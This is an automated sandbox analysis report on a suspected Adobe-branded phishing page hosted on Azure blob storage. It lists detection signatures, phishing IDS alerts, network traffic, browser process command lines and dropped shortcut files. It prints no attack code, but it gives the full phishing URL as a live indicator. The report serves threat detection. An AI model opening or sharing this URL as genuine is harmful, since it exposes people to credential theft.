Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D

Overview

General Information

Sample URL:https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
Analysis ID:1577097

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
HTML page contains base64 encoded files
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,2252962786571783764,12608193894285209074,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T00:57:53.282104+010020264861Potential Corporate Privacy Violation192.168.2.16614611.1.1.153UDP
2024-12-18T00:57:53.282104+010020264861Potential Corporate Privacy Violation192.168.2.16614611.1.1.153UDP
2024-12-18T00:57:53.282254+010020264861Potential Corporate Privacy Violation192.168.2.16506341.1.1.153UDP
2024-12-18T00:57:53.282254+010020264861Potential Corporate Privacy Violation192.168.2.16506341.1.1.153UDP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://adobe.blob.core.windows.net/adobe/adobe.ht... The provided JavaScript snippet appears to be a highly suspicious and potentially malicious script. It exhibits several high-risk indicators, including dynamic code execution through base64-encoded content, potential data exfiltration, and obfuscated code. The combination of these behaviors suggests a high likelihood of malicious intent, warranting a high-risk score.
Source: https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DHTTP Parser: Base64: UEsDBBQACAAIAEqnkVkA...AAEAWAAAAOsWAAAAAA== decoded: PK........J..Y.............f....+..h....4..
Source: unknownHTTPS traffic detected: 23.195.62.26:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.195.62.26:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: Network trafficSuricata IDS: 2026486 - Severity 1 - ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service : 192.168.2.16:61461 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2026486 - Severity 1 - ET PHISHING DNS Lookup for Possible Common Brand Phishing Hosted on Legitimate Windows Service : 192.168.2.16:50634 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 23.195.62.26
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownHTTPS traffic detected: 23.195.62.26:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.195.62.26:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.win@17/11@10/132
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,2252962786571783764,12608193894285209074,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,2252962786571783764,12608193894285209074,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.1.229
truefalse
    high
    cdnjs.cloudflare.com
    104.17.25.14
    truefalse
      high
      www.google.com
      142.250.181.132
      truefalse
        high
        cdn.jsdelivr.net
        unknown
        unknownfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          151.101.1.229
          jsdelivr.map.fastly.netUnited States
          54113FASTLYUSfalse
          172.217.19.206
          unknownUnited States
          15169GOOGLEUSfalse
          1.1.1.1
          unknownAustralia
          13335CLOUDFLARENETUSfalse
          172.217.17.35
          unknownUnited States
          15169GOOGLEUSfalse
          172.217.17.46
          unknownUnited States
          15169GOOGLEUSfalse
          142.250.181.132
          www.google.comUnited States
          15169GOOGLEUSfalse
          104.116.245.16
          unknownUnited States
          20940AKAMAI-ASN1EUfalse
          64.233.164.84
          unknownUnited States
          15169GOOGLEUSfalse
          239.255.255.250
          unknownReserved
          unknownunknownfalse
          142.250.181.3
          unknownUnited States
          15169GOOGLEUSfalse
          172.217.21.35
          unknownUnited States
          15169GOOGLEUSfalse
          104.17.25.14
          cdnjs.cloudflare.comUnited States
          13335CLOUDFLARENETUSfalse
          20.150.53.4
          unknownUnited States
          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          IP
          192.168.2.16
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1577097
          Start date and time:2024-12-18 00:57:19 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsinteractivecookbook.jbs
          Sample URL:https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:13
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • EGA enabled
          Analysis Mode:stream
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal48.phis.win@17/11@10/132
          • Exclude process from analysis (whitelisted): svchost.exe
          • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.206, 64.233.164.84, 20.150.53.4, 172.217.17.46
          • Not all processes where analyzed, report is missing behavior information
          • VT rate limit hit for: https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 22:57:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2673
          Entropy (8bit):3.987997167403094
          Encrypted:false
          SSDEEP:
          MD5:1E4C689FCFBB1F8B6814C6C2A5182896
          SHA1:9838C791C8ABAFCD1826E4CDDE650A186B999F8D
          SHA-256:F5BB2154336ABE6B0C6FCF7962CCCC3CB9CD2A3B8D9C54C82AA612FAA01F3566
          SHA-512:FA3B448986EB77D379CC66E21725995844E1CD03BAF193763A647BD7DFEE6D1C29B4D5B8351627739CE7C9BAF6D9E3D09D9D6DED04458B301F76DB5D64C08DB2
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,....CG.}.P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y0.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 22:57:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2675
          Entropy (8bit):4.003944066261172
          Encrypted:false
          SSDEEP:
          MD5:BC6D93C0B317391E4C71EBF052D0B8DE
          SHA1:4E96C289CA26087204866DA7AB798D76E9675EFF
          SHA-256:830C49B00E8E5D85C7F5BDFD9DAB707333D0B81B6CCD4EA830851B8463090D82
          SHA-512:EC5712313CD949FE0EC2E3704E2895652FFBE5FFFCF50769D32B30DF7A4298B330FB9B47D1C69D626BFA0543B67C1B57AE2C0B88E97EAE62E3297EDF00046052
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.....J.}.P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y0.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2689
          Entropy (8bit):4.012420526765721
          Encrypted:false
          SSDEEP:
          MD5:B661D02EA05EB6759693C1077B97CAB4
          SHA1:28AF19DA8A2A1B4888E1B7DB51E0C2BB6D64606D
          SHA-256:4F0E78D44DEA18D6FE9EEFA652D2BAC93D0E2B9EB0160D2EBBF596B4CD65929F
          SHA-512:A21996DA68A2C13561D9078B697044AAE8D469E229008B99BC0CA74404DD6226CE90B827C102F7A6E068CCD3103DE0F63F65C4BA6EAF134EE326353AB3D3B9A0
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y0.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 22:57:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2677
          Entropy (8bit):4.0035495468453295
          Encrypted:false
          SSDEEP:
          MD5:1D1ECD256D9795EB9A4795EE87509CEE
          SHA1:C42E593611B549E5D0F7D64E32AE8EA30095575C
          SHA-256:F5153883DD68CB3DD4A717944CEA885609B4561FEBB9F18F9C938E432558C0A1
          SHA-512:37B6DF21A009BCFD433926A6FDA7751381533AA206736A909C18BEDC2598C6DAD899CB69EFCB7393A835D6B2E06E62F6D42CBA7086738EF72A380E38B3A1ADD2
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.....A.|.P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y0.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 22:57:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2677
          Entropy (8bit):3.99283621577549
          Encrypted:false
          SSDEEP:
          MD5:7816B3AF6AD43E9A8665EB95343BF217
          SHA1:04C20B8F9BF98F62AD941EF31B614AD1B2675BBD
          SHA-256:8A06C1471E17CA16627C36523A82558B3A35FD154FE2A3B23EB3A7E370190891
          SHA-512:845AA963E72BF978F4EBE817A9E115C35278192723DF45A873C3B26B5A942E07F4FCADAC9472761BD89D0C4A192AC1AD1F243B79FD2C87F56FB6DD6E69774386
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.......}.P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y0.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 22:57:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2679
          Entropy (8bit):4.002158948401662
          Encrypted:false
          SSDEEP:
          MD5:ABBCCEC212402DE826AC06381C853588
          SHA1:056FE6A3176013FB4DF991E1994444174C84A134
          SHA-256:70C2717BDECF0D0BBB32B036F60CBB8BB2C11DD1C2338828768AABC7CF768AFE
          SHA-512:3E88CCCFBE79CA3CA450381F520F1ACD5D413CE582D4BE62976C60E732154CCCC117B65CA150A27CDB013CAE5213ACC4370180F20A7E20A2089126FADF39E2A1
          Malicious:false
          Reputation:unknown
